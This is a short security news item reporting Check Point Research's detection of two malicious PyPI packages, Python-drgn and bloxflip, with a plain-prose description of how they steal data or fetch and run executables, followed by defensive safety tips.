News
Two Malicious Code Packages Designed for Data Compromise Identified
February 2023 by Check Point
Check Point Research warns of malicious code package attacks in 3rd party repositories like PyPi. Recently, CPR prevented two malicious code package attacks, Python-drgn and Bloxflip. These attacks can have serious consequences, including data compromise, operational disruption, and reputation damage. Threat actors leverage package repositories as a reliable and scalable malware distribution channel.
• Python-drgn is a malicious package that was uploaded to PyPI on August 8, 2022.
• Bloxflip disables Windows Defender to avoid detection.
• CPR shares screenshots of malicious code and provides safety tips.
Check Point Research (CPR) has prevented two recent code package attacks. Code package supply chain attacks involve publishing malicious packages or injecting malicious code into legitimate code packages that are distributed through online code repositories and package managers.
This attack vector leverages trusted 3rd party repositories and the vast ecosystems of open-source 3rd party use.
Python-drgn on PyPi
Python-drgn is a malicious package that was uploaded to PyPI on August 8, 2022. By using the Python-drgn, the attackers can then collect private data of multiple users and can abuse it in several ways:
• Selling the information.
• Identity theft.
• Account takeover.
• Collecting information about the company.
Bloxflip on PyPi
Another malicious package our engines detected is bloxflip. First, it disables Windows Defender to avoid detection. Then it downloads an executable from the web using the Python ‘get’ function. Finally, a subprocess is created and executes the malicious executable in the developer environment.
Quote: Lee Levi, Team Leader, Mail security at Check Point
Code package supply chain attacks have increased significantly in recent years. Here, attackers publish malicious packages or inject malicious code into legitimate code packages distributed through online code repositories and package managers. These attacks can have serious consequences, including data compromise, operational disruption, and reputation damage. Today, we’re showing two examples of where we recently prevented code package attacks. The first one is Python-drgn on PyPi, where the attackers could collect private data of multiple users. The second one is bloxflip, which disables Windows Defender to avoid detection. From an attacker’s perspective, package repositories are a reliable and scalable malware distribution channel. We warn the public to exercise cyber safety by verifying the legitimacy of all source code acquired from 3rd parties.”
Cyber Safety Tips
• Verify the legitimacy of all source code acquired from third parties, whether for internal use or if planning to bundle it with other products or services.
• Make sure you encrypt sensitive data both in transit and at rest.
• Perform periodic audits of the code packages you use and validate that these are the correct versions and commonly used.
Use CISA bests practices to deploy safer and more secure behaviors in your organization.
